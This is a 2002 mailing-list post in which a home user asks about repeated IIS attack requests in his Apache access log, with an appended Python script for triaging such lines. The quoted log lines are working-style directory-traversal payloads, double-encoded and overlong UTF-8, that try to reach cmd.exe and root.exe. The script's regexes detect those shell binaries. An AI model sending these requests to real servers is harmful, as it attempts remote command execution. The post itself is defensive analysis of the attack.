[plug] Anyone seen this particular attack pattern before?

Alan Graham alan.graham at infonetsystems.com.au
Thu Jan 17 11:03:56 WST 2002


I've just set up a web server on my firewall, to show some photos of the
kids to my folks in England.  Within a few days, I started seeing this
attack.  It comes in regularly, from a lot of different IPs, and it's
obviously aimed at NT IIS.  Ha.  I'm thinking it's a well known scripted
attack, or possibly a zombied attack?  There's a pause of about 5 minutes
between each attack.  The pisser is that most of the hosts appear to be
within iinet.  I suppose I'd better let them know too.

Can anyone tell me any more about it?

Extract of access_log
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 282 "-" "-"
"GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 280 "-" "-"
"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290 "-" "-"
"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290 "-" "-"
"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"
"GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" "-"
"GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" "-"
"GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "-" "-"
"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
"GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
"GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
"GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 287 "-" "-"
"GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 287 "-" "-"
"GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"
"GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"

Regards

Alan Graham
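
Added example, not part of the original post: a Python sketch of how a defender could triage request lines like those in the extract, by percent-decoding the path until it stops changing, folding byte pairs led by 0xC0/0xC1 to the ASCII byte a lenient decoder would produce, and then flagging traversal towards cmd.exe or root.exe. The function names, the finding labels and the last sample line are assumptions made for this illustration.

```python
import re
from urllib.parse import unquote_to_bytes

REQUEST = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+" (\d{3})')
SHELL = re.compile(rb'[/\\](?:cmd|root)\.exe$', re.I)
TRAVERSAL = re.compile(rb'\.\.[/\\]')
OVERLONG = re.compile(rb'[\xc0\xc1](.)', re.S)  # lead bytes never valid in UTF-8

def decode_rounds(path, limit=5):
    """Percent-decode until the value stops changing; return (bytes, rounds)."""
    data, rounds = path.encode("ascii", "replace"), 0
    while rounds < limit:
        nxt = unquote_to_bytes(data)
        if nxt == data:
            break
        data, rounds = nxt, rounds + 1
    return data, rounds

def fold_overlong(data):
    """Replace C0/C1-led pairs with the ASCII byte a lenient decoder would yield."""
    def fold(m):
        return bytes([((m.group(0)[0] & 0x1F) << 6) | (m.group(1)[0] & 0x3F)])
    return OVERLONG.sub(fold, data)

def classify(line):
    """Return (status, sorted findings) for one log line, or None if unparsable."""
    m = REQUEST.search(line)
    if not m:
        return None
    decoded, rounds = decode_rounds(m.group(1).split("?", 1)[0])
    folded = fold_overlong(decoded)
    findings = set()
    if rounds > 1:
        findings.add("multi-pass-encoding")
    if folded != decoded:
        findings.add("overlong-utf8")
    if TRAVERSAL.search(folded):
        findings.add("traversal")
    if SHELL.search(folded):
        findings.add("shell-binary")
    if findings and m.group(2).startswith("2"):
        findings.add("SERVED")  # probe got a 2xx answer: investigate first
    return int(m.group(2)), sorted(findings)

# First three lines are taken from the extract above; the last one is constructed.
SAMPLE = ['"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 282 "-" "-"',
          '"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"',
          '"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"',
          '"GET /photos/kids01.jpg HTTP/1.0" 200 48211 "-" "-"']
if __name__ == "__main__":
    for line in SAMPLE:
        print(classify(line))
```

Every flagged line in the extract carries a 404 or 400 status; a line tagged SERVED would be the one to look at first.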


